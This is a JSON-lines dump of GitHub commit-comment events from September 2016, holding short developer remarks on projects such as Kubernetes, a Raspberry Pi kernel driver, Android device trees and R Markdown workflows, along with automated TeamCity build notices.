{"id":"4567954194","type":"CommitCommentEvent","actor":{"login":"DevSwift"},"repo":{"name":"aosp-msm8960/android_device_asus_flo"},"payload":{"comment":{"id":19035843,"position":null,"line":null,"path":null,"commit_id":"f676aef2e5894675cd60357e0d04d279a5ab6a99","created_at":"2016-09-15T13:05:09Z","updated_at":"2016-09-15T13:05:09Z","body":"this is how Cyanogen do this so :) this is easiest way"}},"created_at":"2016-09-15T13:05:09Z"}
{"id":"4567957336","type":"CommitCommentEvent","actor":{"login":"sarsiz"},"repo":{"name":"sarsiz/Java"},"payload":{"comment":{"id":19035850,"position":null,"line":null,"path":null,"commit_id":"52e64ed2b46d36ee4add75aba288efb46121f4fb","created_at":"2016-09-15T13:05:43Z","updated_at":"2016-09-15T13:05:43Z","body":"I'm going back... After learning JSP, servlets, etc. Now I will be doing Applets, Threads and All."}},"created_at":"2016-09-15T13:05:43Z"}
{"id":"4567958971","type":"CommitCommentEvent","actor":{"login":"Ranga57"},"repo":{"name":"Ranga57/hello-github"},"payload":{"comment":{"id":19035855,"position":null,"line":null,"path":null,"commit_id":"022788f734d3b0664406605f0b06801f6ce76e01","created_at":"2016-09-15T13:06:01Z","updated_at":"2016-09-15T13:06:01Z","body":"trial"}},"created_at":"2016-09-15T13:06:01Z"}
{"id":"4567966555","type":"CommitCommentEvent","actor":{"login":"tzach"},"repo":{"name":"scylladb/scylla"},"payload":{"comment":{"id":19035880,"position":null,"line":null,"path":null,"commit_id":"acb83073e2cc5d0f999aec3ac0034f7beaa0de37","created_at":"2016-09-15T13:07:21Z","updated_at":"2016-09-15T13:07:21Z","body":"@slivne @penberg please backport to 1.3.1\r\nthis trivial issue stopped me from running AMI"}},"created_at":"2016-09-15T13:07:21Z"}
{"id":"4567968966","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19035886,"position":null,"line":null,"path":null,"commit_id":"988d67ddce0e8e00ff04512fe37020385e811fb9","created_at":"2016-09-15T13:07:50Z","updated_at":"2016-09-15T13:07:50Z","body":"TeamCity Todo :: Build [Build 101](http://109.103.226.38:8512/viewLog.html?buildId=38496&buildTypeId=Todo_Build) is now running\n"}},"created_at":"2016-09-15T13:07:50Z"}
{"id":"4567972400","type":"CommitCommentEvent","actor":{"login":"crapola"},"repo":{"name":"crapola/SimpleText"},"payload":{"comment":{"id":19035894,"position":4,"line":74,"path":"SimpleText.cbp","commit_id":"e45fc122d6a1f0d0997d2cc22910ccffbc4e6e62","created_at":"2016-09-15T13:08:29Z","updated_at":"2016-09-15T13:08:29Z","body":"bla"}},"created_at":"2016-09-15T13:08:29Z"}
{"id":"4567973063","type":"CommitCommentEvent","actor":{"login":"ThierryO"},"repo":{"name":"inbo/natuurindicatoren"},"payload":{"comment":{"id":19035897,"position":null,"line":null,"path":null,"commit_id":"e03e6bf09a7641cf7e35ba645934e97c0bc43421","created_at":"2016-09-15T13:08:36Z","updated_at":"2016-09-15T13:08:36Z","body":"have a look at `devtools::use_readme_rmd`. This function add a README.Rmd and a git-hook that checks if both README.Rmd and README.md are added to a commit. I've applied this to https://github.com/inbo/multimput/blob/master/README.md\r\n\r\nDownside: it returns an error when changes in the Rmd don't result in changes into the md or vice versa. The latter is often the case in my example (due to the child document)."}},"created_at":"2016-09-15T13:08:36Z"}
{"id":"4567973317","type":"CommitCommentEvent","actor":{"login":"pietro909"},"repo":{"name":"pietro909/one-source-of-truth-for-angular"},"payload":{"comment":{"id":19035899,"position":null,"line":null,"path":null,"commit_id":"d0a84a3b6cee1ea5d17f405bf492b99b5a065760","created_at":"2016-09-15T13:08:39Z","updated_at":"2016-09-15T13:08:39Z","body":"need to bring these back to master branch"}},"created_at":"2016-09-15T13:08:39Z"}
{"id":"4567975421","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19035905,"position":null,"line":null,"path":null,"commit_id":"60a2fb8b03699c9b589032e3efa25f24c3420811","created_at":"2016-09-15T13:09:06Z","updated_at":"2016-09-15T13:09:06Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1033)"}},"created_at":"2016-09-15T13:09:06Z"}
{"id":"4567977613","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19035912,"position":null,"line":null,"path":null,"commit_id":"4f8a24d5566e3b95f85506ec5e1671b3e968c58b","created_at":"2016-09-15T13:09:33Z","updated_at":"2016-09-15T13:09:33Z","body":"it's kinda a change that should be made though, it wasn't done long after the 0.9.3 update, so I hope (nearly) no one has any issues"}},"created_at":"2016-09-15T13:09:33Z"}
{"id":"4567979483","type":"CommitCommentEvent","actor":{"login":"hatstand"},"repo":{"name":"clementine-player/Clementine"},"payload":{"comment":{"id":19035920,"position":null,"line":null,"path":null,"commit_id":"170c64cd8bef9df2ea88dd4f72eec641c250bcfd","created_at":"2016-09-15T13:09:57Z","updated_at":"2016-09-15T13:09:57Z","body":"It's fine if you're building your own clementine."}},"created_at":"2016-09-15T13:09:57Z"}
{"id":"4567981352","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19035924,"position":null,"line":null,"path":null,"commit_id":"a8858981cb5b2a7903f0453a30acae23e8a5646c","created_at":"2016-09-15T13:10:21Z","updated_at":"2016-09-15T13:10:21Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 35](http://munit-050:8112/tc/viewLog.html?buildId=99052&buildTypeId=BranchesTests_GitYaegorSandbox) outcome was **SUCCESS**\nSummary: Running Build time: 0:10:1"}},"created_at":"2016-09-15T13:10:21Z"}
{"id":"4567981686","type":"CommitCommentEvent","actor":{"login":"Superberti"},"repo":{"name":"raspberrypi/linux"},"payload":{"comment":{"id":19035926,"position":null,"line":null,"path":null,"commit_id":"95cb7e4de59547506de4b669448e11381ec4abfe","created_at":"2016-09-15T13:10:24Z","updated_at":"2016-09-15T13:10:24Z","body":"Hi,\r\neven with auto_sense on I don't think that the line 'sense = sense ? 0 : 1' does help here. An active-low receiver is always an active low receiver and it happens quite frequently that this driver detects some glitches from the receiver which triggers the sense reversing. After the reversing the receiver stops working at all until the sense flag gets reversed again. This is what several people encountered and it makes the driver quite unreliable.\r\nI suggest doing nothing at all when detecting these glitches in line 280.\r\n\r\nBye,\r\nOliver"}},"created_at":"2016-09-15T13:10:24Z"}
{"id":"4567984109","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19035933,"position":null,"line":null,"path":null,"commit_id":"4f8a24d5566e3b95f85506ec5e1671b3e968c58b","created_at":"2016-09-15T13:10:51Z","updated_at":"2016-09-15T13:10:51Z","body":"hope no one gets issues"}},"created_at":"2016-09-15T13:10:51Z"}
{"id":"4567994845","type":"CommitCommentEvent","actor":{"login":"patham9"},"repo":{"name":"patham9/narjure"},"payload":{"comment":{"id":19035968,"position":null,"line":null,"path":null,"commit_id":"a902ec959b3c2d2c2f07f3e6fcabac6846dcfdbc","created_at":"2016-09-15T13:12:57Z","updated_at":"2016-09-15T13:12:57Z","body":"mark"}},"created_at":"2016-09-15T13:12:57Z"}
{"id":"4567995937","type":"CommitCommentEvent","actor":{"login":"patham9"},"repo":{"name":"patham9/narjure"},"payload":{"comment":{"id":19035971,"position":null,"line":null,"path":null,"commit_id":"05f6fa7866e76521f60f908d1e9480391227072b","created_at":"2016-09-15T13:13:11Z","updated_at":"2016-09-15T13:13:11Z","body":"mark"}},"created_at":"2016-09-15T13:13:11Z"}
{"id":"4567997069","type":"CommitCommentEvent","actor":{"login":"patham9"},"repo":{"name":"patham9/narjure"},"payload":{"comment":{"id":19035978,"position":null,"line":null,"path":null,"commit_id":"fb562f433e6994ba5b4b99ddc2ab1ff32bb0cf28","created_at":"2016-09-15T13:13:24Z","updated_at":"2016-09-15T13:13:24Z","body":"mark"}},"created_at":"2016-09-15T13:13:24Z"}
{"id":"4567998256","type":"CommitCommentEvent","actor":{"login":"Anil-Raj"},"repo":{"name":"Anil-Raj/Anil-Raj.github.io"},"payload":{"comment":{"id":19035984,"position":null,"line":null,"path":null,"commit_id":"ab903a727c2cea4fd7385c136021721e4a23c01c","created_at":"2016-09-15T13:13:39Z","updated_at":"2016-09-15T13:13:39Z","body":"trying to delete folder"}},"created_at":"2016-09-15T13:13:39Z"}
{"id":"4567999544","type":"CommitCommentEvent","actor":{"login":"ruckram"},"repo":{"name":"ruckram/hello-world"},"payload":{"comment":{"id":19035989,"position":null,"line":null,"path":null,"commit_id":"643a338ff259f3db1f58dad40b5a5e66eca4a5cf","created_at":"2016-09-15T13:13:52Z","updated_at":"2016-09-15T13:13:52Z","body":"It looks ok to merge"}},"created_at":"2016-09-15T13:13:52Z"}
{"id":"4568000012","type":"CommitCommentEvent","actor":{"login":"peterdesmet"},"repo":{"name":"inbo/natuurindicatoren"},"payload":{"comment":{"id":19035990,"position":null,"line":null,"path":null,"commit_id":"e03e6bf09a7641cf7e35ba645934e97c0bc43421","created_at":"2016-09-15T13:13:58Z","updated_at":"2016-09-15T13:13:58Z","body":"I would try to keep it as simple as possible. In this commit it's already great to see the figures listed in the changed files. If those figures are updated, GitHub even allows nice comparisons between the previous and current version.\r\n\r\nThe only downside remains that the figures are not shown in context with the text in the place where you want to write the text, i.e. the Rmd... but the current hack does work to solve that..."}},"created_at":"2016-09-15T13:13:58Z"}
{"id":"4568003515","type":"CommitCommentEvent","actor":{"login":"popcornmix"},"repo":{"name":"raspberrypi/linux"},"payload":{"comment":{"id":19035996,"position":null,"line":null,"path":null,"commit_id":"95cb7e4de59547506de4b669448e11381ec4abfe","created_at":"2016-09-15T13:14:39Z","updated_at":"2016-09-15T13:14:39Z","body":"@IngoKresse any thoughts on this?"}},"created_at":"2016-09-15T13:14:39Z"}
{"id":"4568006387","type":"CommitCommentEvent","actor":{"login":"humblec"},"repo":{"name":"humblec/kubernetes"},"payload":{"comment":{"id":19036013,"position":219,"line":527,"path":"pkg/volume/glusterfs/glusterfs.go","commit_id":"fe6122b238358dc1704b302e2f44414294ee098d","created_at":"2016-09-15T13:15:15Z","updated_at":"2016-09-15T13:15:15Z","body":"@rootfs Meanwhile I have the ep/svc deletion commit here https://github.com/humblec/kubernetes/commit/5b6925f022f0ff1e9940e4c65b5aac0d989dd769. I will suqash these 3 commits accordingly."}},"created_at":"2016-09-15T13:15:15Z"}
{"id":"4568006440","type":"CommitCommentEvent","actor":{"login":"jco-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19036014,"position":5,"line":426,"path":"addons/stock/procurement.py","commit_id":"5006ec9ca4f344baf52970860b1e3705a96bd142","created_at":"2016-09-15T13:15:16Z","updated_at":"2016-09-15T13:15:16Z","body":"indeed..."}},"created_at":"2016-09-15T13:15:16Z"}
{"id":"4568008049","type":"CommitCommentEvent","actor":{"login":"Votun"},"repo":{"name":"Votun/sberschool"},"payload":{"comment":{"id":19036020,"position":53,"line":53,"path":"src/ru/sbt/lesson2/Person.java","commit_id":"5681f6cfb4afe91f4018893c9f12af36d4cc69ac","created_at":"2016-09-15T13:15:33Z","updated_at":"2016-09-15T13:15:33Z","body":"It will not work properly though. ClassPerson is mutable(spouse troubles). \r\nIt's just a test."}},"created_at":"2016-09-15T13:15:33Z"}
{"id":"4568008533","type":"CommitCommentEvent","actor":{"login":"theoryshaw"},"repo":{"name":"OpeningDesign/ULI_Gooseberry"},"payload":{"comment":{"id":19036022,"position":null,"line":null,"path":null,"commit_id":"cae741bebd573034e9cc7628ca871716270e14dd","created_at":"2016-09-15T13:15:38Z","updated_at":"2016-09-15T13:15:38Z","body":"@yorikvanhavre The existing dimensions in the DWG are probably pretty accurate, but here's the existing field measurements, just in case. "}},"created_at":"2016-09-15T13:15:38Z"}
{"id":"4568010340","type":"CommitCommentEvent","actor":{"login":"Votun"},"repo":{"name":"Votun/sberschool"},"payload":{"comment":{"id":19036027,"position":68,"line":68,"path":"src/ru/sbt/lesson2/Person.java","commit_id":"5681f6cfb4afe91f4018893c9f12af36d4cc69ac","created_at":"2016-09-15T13:15:59Z","updated_at":"2016-09-15T13:15:59Z","body":"It will not work properly though. ClassPerson is mutable(spouse troubles). \r\nIt's just a test."}},"created_at":"2016-09-15T13:15:59Z"}
{"id":"4568010952","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"kubernetes/kubernetes"},"payload":{"comment":{"id":19036029,"position":63,"line":63,"path":"pkg/kubectl/cmd/util/shortcut_restmapper.go","commit_id":"9fd91e82bf15f7912a8e7ced357f65a539b4bf25","created_at":"2016-09-15T13:16:07Z","updated_at":"2016-09-15T13:16:07Z","body":"> cannot quite follow your code here? Why this complicated comparison of resource with \"all\" via a map?\r\n\r\nLegacy changes as I recall (its been a while since we wrote it in origin).  I'll rip it out."}},"created_at":"2016-09-15T13:16:07Z"}
{"id":"4568013984","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19036034,"position":null,"line":null,"path":null,"commit_id":"2999ee57ddb86076d973f529d6af1c14e3e58d50","created_at":"2016-09-15T13:16:40Z","updated_at":"2016-09-15T13:16:40Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1010](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13351&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-15T13:16:40Z"}
{"id":"4568014335","type":"CommitCommentEvent","actor":{"login":"PlusMinus0"},"repo":{"name":"rhabbachi/displaylink-pkgbuild"},"payload":{"comment":{"id":19036036,"position":4,"line":6,"path":"PKGBUILD","commit_id":"8d8143696c6af4421e0800c91a67eb777bcc7d98","created_at":"2016-09-15T13:16:44Z","updated_at":"2016-09-15T13:16:44Z","body":"This should not be necessary, use pkgver instead. Also, pkgrel should be 1."}},"created_at":"2016-09-15T13:16:44Z"}
{"id":"4568017241","type":"CommitCommentEvent","actor":{"login":"Meticulus"},"repo":{"name":"Meticulus/android_device_samsung_codinalte"},"payload":{"comment":{"id":19036047,"position":null,"line":null,"path":null,"commit_id":"7aaabe8577a61a2b0cd039670cd639c0a06373d3","created_at":"2016-09-15T13:17:18Z","updated_at":"2016-09-15T13:17:18Z","body":"LIBS: In carbon LP 5.1.1, All of the libs worked perfectly. There was no difference and I verified that the new libs were being used by putting my name in an \"ALOGI\".\r\n\r\nI got MTP working by patching MtpService: it some sort of security issue...\r\n\r\nGPS: was already working, It just wasnt working in the app that I was using. Tried with a different app and it was fine.\r\n\r\nA2DP: I'll test when I have time... but I have heard no complaints yet.\r\n\r\nRIL: USED rild and libril from LP and it works perfect.\r\n\r\nWE NEED TO BRING UP A 3.1 KERNEL ;)\r\n\r\nUID_CPUTIME is missing too..."}},"created_at":"2016-09-15T13:17:18Z"}
{"id":"4568025151","type":"CommitCommentEvent","actor":{"login":"PlusMinus0"},"repo":{"name":"rhabbachi/displaylink-pkgbuild"},"payload":{"comment":{"id":19036062,"position":10,"line":14,"path":"PKGBUILD","commit_id":"8d8143696c6af4421e0800c91a67eb777bcc7d98","created_at":"2016-09-15T13:18:48Z","updated_at":"2016-09-15T13:18:48Z","body":"You don't need the old drive, if you're going to install the new one, right?"}},"created_at":"2016-09-15T13:18:48Z"}
{"id":"4568025346","type":"CommitCommentEvent","actor":{"login":"HoborgHUN"},"repo":{"name":"m-vdb/confluence-python"},"payload":{"comment":{"id":19036063,"position":null,"line":null,"path":null,"commit_id":"bbc759742f22c1a27a8b36dc736bc6b7716f0776","created_at":"2016-09-15T13:18:50Z","updated_at":"2016-09-15T13:18:50Z","body":"'updatepage' and 'addpage' have different keyword arguments, so this doesn't work."}},"created_at":"2016-09-15T13:18:50Z"}
{"id":"4568034236","type":"CommitCommentEvent","actor":{"login":"ThierryO"},"repo":{"name":"inbo/natuurindicatoren"},"payload":{"comment":{"id":19036087,"position":null,"line":null,"path":null,"commit_id":"e03e6bf09a7641cf7e35ba645934e97c0bc43421","created_at":"2016-09-15T13:20:31Z","updated_at":"2016-09-15T13:20:31Z","body":"This might be a simpler solution:\n\n- The user which works only online updates the Rmd and waits for the html\nto be rendered automagically.\n- The user which works offline using RStudio can simply render the Rmd in\nRStudio.\n\nir. Thierry Onkelinx\nInstituut voor natuur- en bosonderzoek / Research Institute for Nature and\nForest\nteam Biometrie & Kwaliteitszorg / team Biometrics & Quality Assurance\nKliniekstraat 25\n1070 Anderlecht\nBelgium\n\nTo call in the statistician after the experiment is done may be no more\nthan asking him to perform a post-mortem examination: he may be able to say\nwhat the experiment died of. ~ Sir Ronald Aylmer Fisher\nThe plural of anecdote is not data. ~ Roger Brinner\nThe combination of some data and an aching desire for an answer does not\nensure that a reasonable answer can be extracted from a given body of data.\n~ John Tukey\n\n2016-09-15 15:13 GMT+02:00 Peter Desmet <notifications@github.com>:\n\n> I would try to keep it as simple as possible. In this commit it's already\n> great to see the figures listed in the changed files. If those figures are\n> updated, GitHub even allows nice comparisons between the previous and\n> current version.\n>\n> The only downside remains that the figures are not shown in context with\n> the text in the place where you want to write the text, i.e. the Rmd... but\n> the current hack does work to solve that...\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/inbo/natuurindicatoren/commit/e03e6bf09a7641cf7e35ba645934e97c0bc43421#commitcomment-19035990>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAbQrKnLUzTtuV7NlZQPDBEGqQUBZ1Z2ks5qqUSWgaJpZM4J90-g>\n> .\n>\n"}},"created_at":"2016-09-15T13:20:31Z"}
{"id":"4568037244","type":"CommitCommentEvent","actor":{"login":"HoborgHUN"},"repo":{"name":"m-vdb/confluence-python"},"payload":{"comment":{"id":19036100,"position":17,"line":31,"path":"confluence/api.py","commit_id":"a8e5ae2994dbf3ed8338d6bd9b6916ba3ef885a8","created_at":"2016-09-15T13:21:05Z","updated_at":"2016-09-15T13:21:05Z","body":"This line throws an error if no label is given."}},"created_at":"2016-09-15T13:21:05Z"}
{"id":"4568038745","type":"CommitCommentEvent","actor":{"login":"lucatamtam"},"repo":{"name":"traedamatic/elogram"},"payload":{"comment":{"id":19036104,"position":null,"line":null,"path":null,"commit_id":"33b0972f1fcc4d771af349607d735c6e3c5f7fbb","created_at":"2016-09-15T13:21:22Z","updated_at":"2016-09-15T13:21:22Z","body":"please merge this pull request"}},"created_at":"2016-09-15T13:21:22Z"}
{"id":"4568039197","type":"CommitCommentEvent","actor":{"login":"skywalkman2210"},"repo":{"name":"dkelz16/MemoryGame"},"payload":{"comment":{"id":19036105,"position":null,"line":null,"path":null,"commit_id":"8df8b7a4bf2d0473b0fad664d559e1753d9e7e4f","created_at":"2016-09-15T13:21:27Z","updated_at":"2016-09-15T13:21:27Z","body":"I'm getting a shit ton of errors? does it work in your visual studio??"}},"created_at":"2016-09-15T13:21:27Z"}
{"id":"4568039773","type":"CommitCommentEvent","actor":{"login":"tfausak"},"repo":{"name":"tfausak/octane"},"payload":{"comment":{"id":19036106,"position":null,"line":null,"path":null,"commit_id":"8dcb1194f587cebc175b0de95ca85e3c8740b7e8","created_at":"2016-09-15T13:21:33Z","updated_at":"2016-09-15T13:21:33Z","body":"This fixed #62 by removing the orphan `instance Arbitrary Version`. "}},"created_at":"2016-09-15T13:21:33Z"}
{"id":"4568040545","type":"CommitCommentEvent","actor":{"login":"GS05-43-MatsumuraYu"},"repo":{"name":"GS05-43-MatsumuraYu/kadai"},"payload":{"comment":{"id":19036109,"position":null,"line":null,"path":null,"commit_id":"977a4188053c4950c9dfb4de57c67afdea6bf598","created_at":"2016-09-15T13:21:43Z","updated_at":"2016-09-15T13:21:43Z","body":"kadaiファイルに課題を追加していくやり方がわかりませんでした。"}},"created_at":"2016-09-15T13:21:43Z"}
{"id":"4568040787","type":"CommitCommentEvent","actor":{"login":"ChrisCummins"},"repo":{"name":"codeplaysoftware/visioncpp"},"payload":{"comment":{"id":19036110,"position":null,"line":null,"path":null,"commit_id":"142e240f615c8bba5954a0ff0bbf5289f47df81a","created_at":"2016-09-15T13:21:45Z","updated_at":"2016-09-15T13:21:45Z","body":":smile: "}},"created_at":"2016-09-15T13:21:45Z"}
{"id":"4568041659","type":"CommitCommentEvent","actor":{"login":"IGordynskyi"},"repo":{"name":"IGordynskyi/SAI"},"payload":{"comment":{"id":19036113,"position":null,"line":null,"path":null,"commit_id":"260bd5bab2665fd80bb5525f6b4c185985363b63","created_at":"2016-09-15T13:21:55Z","updated_at":"2016-09-15T13:21:55Z","body":"Added to test SAI ACL action redirect."}},"created_at":"2016-09-15T13:21:55Z"}
{"id":"4568046682","type":"CommitCommentEvent","actor":{"login":"theoryshaw"},"repo":{"name":"OpeningDesign/ULI_Demising_Wall"},"payload":{"comment":{"id":19036129,"position":null,"line":null,"path":null,"commit_id":"e27922314cf9399884c846428602f952a028c5d4","created_at":"2016-09-15T13:22:48Z","updated_at":"2016-09-15T13:22:48Z","body":"@yorikvanhavre Here's the 2nd small TI project."}},"created_at":"2016-09-15T13:22:48Z"}
{"id":"4568049417","type":"CommitCommentEvent","actor":{"login":"winlinvip"},"repo":{"name":"ossrs/srs"},"payload":{"comment":{"id":19036133,"position":null,"line":null,"path":null,"commit_id":"c7b97aa1c3de380451e2d229fc5bef702e2d264d","created_at":"2016-09-15T13:23:17Z","updated_at":"2016-09-15T13:23:17Z","body":"https://github.com/ossrs/srs/issues/413"}},"created_at":"2016-09-15T13:23:17Z"}
{"id":"4568064919","type":"CommitCommentEvent","actor":{"login":"leif81"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19036167,"position":null,"line":null,"path":null,"commit_id":"36ea8f4e6a4cd8c2512f54a034aa3ac9864b28c8","created_at":"2016-09-15T13:25:59Z","updated_at":"2016-09-15T13:25:59Z","body":"Hmm surprised this was needed. Those spans with `display: none` shouldn't occupy space. From my understanding that's difference from `visibility: hidden`."}},"created_at":"2016-09-15T13:25:59Z"}
{"id":"4568065259","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19036168,"position":null,"line":null,"path":null,"commit_id":"3d18adaa5fc069fa3808e2721651578a799848b6","created_at":"2016-09-15T13:26:02Z","updated_at":"2016-09-15T13:26:02Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1011](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13354&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-15T13:26:02Z"}
{"id":"4568065686","type":"CommitCommentEvent","actor":{"login":"Meticulus"},"repo":{"name":"Meticulus/android_device_samsung_codinalte"},"payload":{"comment":{"id":19036169,"position":null,"line":null,"path":null,"commit_id":"7aaabe8577a61a2b0cd039670cd639c0a06373d3","created_at":"2016-09-15T13:26:09Z","updated_at":"2016-09-15T13:26:09Z","body":"A2DP: This seems like a wake lock issue. If A2DP is in use then there should be a wake lock in effect. Perhaps a Sepolicy denial to /sys/kernel/wakelock ( <- something like that)"}},"created_at":"2016-09-15T13:26:09Z"}
{"id":"4568066301","type":"CommitCommentEvent","actor":{"login":"alinochkaaa"},"repo":{"name":"alinochkaaa/hello-world"},"payload":{"comment":{"id":19036173,"position":null,"line":null,"path":null,"commit_id":"3deb495c298adfa389cbe60e3ba33e2abb423e5b","created_at":"2016-09-15T13:26:15Z","updated_at":"2016-09-15T13:26:15Z","body":"# include <stdio.h>\r\n\r\nint main(void)\r\n\r\n{\r\n    printf (\"hello, world\\n\");\r\n}\r\n"}},"created_at":"2016-09-15T13:26:15Z"}
{"id":"4568068089","type":"CommitCommentEvent","actor":{"login":"skellock"},"repo":{"name":"reactotron/reactotron"},"payload":{"comment":{"id":19036177,"position":57,"line":57,"path":"packages/reactotron-apisauce/package.json","commit_id":"97d86c73835b041deca77730b05d06d7aee78b14","created_at":"2016-09-15T13:26:33Z","updated_at":"2016-09-15T13:26:33Z","body":"Uh oh.   Let me bump the dependencies & re-release."}},"created_at":"2016-09-15T13:26:33Z"}
{"id":"4568070410","type":"CommitCommentEvent","actor":{"login":"kpashka"},"repo":{"name":"kpashka/annabelle"},"payload":{"comment":{"id":19036186,"position":null,"line":null,"path":null,"commit_id":"73560dea646d30258cbd51552613ee7879c0a5e2","created_at":"2016-09-15T13:26:59Z","updated_at":"2016-09-15T13:26:59Z","body":"Awesome! 👍 "}},"created_at":"2016-09-15T13:26:59Z"}
{"id":"4568072625","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19036196,"position":null,"line":null,"path":null,"commit_id":"2999ee57ddb86076d973f529d6af1c14e3e58d50","created_at":"2016-09-15T13:27:24Z","updated_at":"2016-09-15T13:27:24Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1010](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13351&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 238, ignored: 3 Build time: 00:10:44"}},"created_at":"2016-09-15T13:27:24Z"}
{"id":"4568075822","type":"CommitCommentEvent","actor":{"login":"nfeske"},"repo":{"name":"ehmry/genode"},"payload":{"comment":{"id":19036210,"position":4,"line":31,"path":"repos/os/include/input_session/client.h","commit_id":"f0eb07a7f0dbbe1b66517cbc4d8acfbcca8ef4e3","created_at":"2016-09-15T13:27:59Z","updated_at":"2016-09-15T13:27:59Z","body":"Should better be a size_t."}},"created_at":"2016-09-15T13:27:59Z"}
{"id":"4568076152","type":"CommitCommentEvent","actor":{"login":"NickSuglobov"},"repo":{"name":"CocoaLumberjack/CocoaLumberjack"},"payload":{"comment":{"id":19036211,"position":null,"line":null,"path":null,"commit_id":"ec2c138ff3d6ce9dabe832cc7c656735c3a8775d","created_at":"2016-09-15T13:28:03Z","updated_at":"2016-09-15T13:28:03Z","body":"Hey what about swift 3? :)"}},"created_at":"2016-09-15T13:28:03Z"}
{"id":"4568077020","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19036214,"position":27,"line":235,"path":"californium-core/src/main/java/org/eclipse/californium/core/CoapServer.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-15T13:28:13Z","updated_at":"2016-09-15T13:28:13Z","body":"I'm not sure to understand what we try to do now ?\r\n(Not directly linked to the MessageExchangeStore introduction ?)"}},"created_at":"2016-09-15T13:28:13Z"}
{"id":"4568077083","type":"CommitCommentEvent","actor":{"login":"jlran"},"repo":{"name":"jlran/StudyJavaCode"},"payload":{"comment":{"id":19036215,"position":null,"line":null,"path":null,"commit_id":"8cdf3b53c2e1f17a712032e17f4ed5b75813cb1e","created_at":"2016-09-15T13:28:14Z","updated_at":"2016-09-15T13:28:14Z","body":"这是学习Java时的代码"}},"created_at":"2016-09-15T13:28:14Z"}
{"id":"4568077502","type":"CommitCommentEvent","actor":{"login":"Bhasker16"},"repo":{"name":"tatobari/hx711py"},"payload":{"comment":{"id":19036218,"position":null,"line":null,"path":null,"commit_id":"0f1ca0beef541063f663d17b89277482157724d9","created_at":"2016-09-15T13:28:18Z","updated_at":"2016-09-15T13:28:18Z","body":"Hi tatobari,\r\n\r\nThanks for sharing knowledge. When I used your code I'm able to read values from load cell using HX711 ADC but the values are not consistent even without weight & we are not able to calibrate weight from the readings.\r\n\r\nComponents used:\r\nRaspberry pi model 3\r\n10 kg Load cell CZL-601\r\nHX711 24 bit ADC\r\n\r\nPlease share your inputs on how can we debug the issue is either in the device  or the code."}},"created_at":"2016-09-15T13:28:18Z"}
{"id":"4568078040","type":"CommitCommentEvent","actor":{"login":"Emily-Jiang"},"repo":{"name":"WASdev/microprofile-conference"},"payload":{"comment":{"id":19036220,"position":null,"line":null,"path":null,"commit_id":"4a34a493bebf4dd91f1ce9873201d4df01f4f7e2","created_at":"2016-09-15T13:28:22Z","updated_at":"2016-09-15T13:28:22Z","body":"You need to add @Priority to enable the interceptor"}},"created_at":"2016-09-15T13:28:22Z"}
{"id":"4568078311","type":"CommitCommentEvent","actor":{"login":"CodingCat"},"repo":{"name":"dmlc/xgboost"},"payload":{"comment":{"id":19036221,"position":27,"line":36,"path":"jvm-packages/xgboost4j-spark/src/main/scala/ml/dmlc/xgboost4j/scala/spark/XGBoostModel.scala","commit_id":"fb02797e2ac3ea41f52facb3469926575c4d63cb","created_at":"2016-09-15T13:28:25Z","updated_at":"2016-09-15T13:28:25Z","body":"the major reason to avoid extending ProbabilisticClassificationModel is that it requires to implement `protected def predictRaw(features: FeaturesType): Vector` which is essentially to predict for a certain instance and is not support well in the current XGBoost. "}},"created_at":"2016-09-15T13:28:25Z"}
{"id":"4568086360","type":"CommitCommentEvent","actor":{"login":"saudet"},"repo":{"name":"deeplearning4j/libnd4j"},"payload":{"comment":{"id":19036243,"position":null,"line":null,"path":null,"commit_id":"1af297967e0a45ed44489ead826695121037aad3","created_at":"2016-09-15T13:29:55Z","updated_at":"2016-09-15T13:29:55Z","body":"Yeah, it ends up doing what we need anyway so that's why I had left it like\nthat, not being able to figure out what CMake wants us to do :)\n"}},"created_at":"2016-09-15T13:29:55Z"}
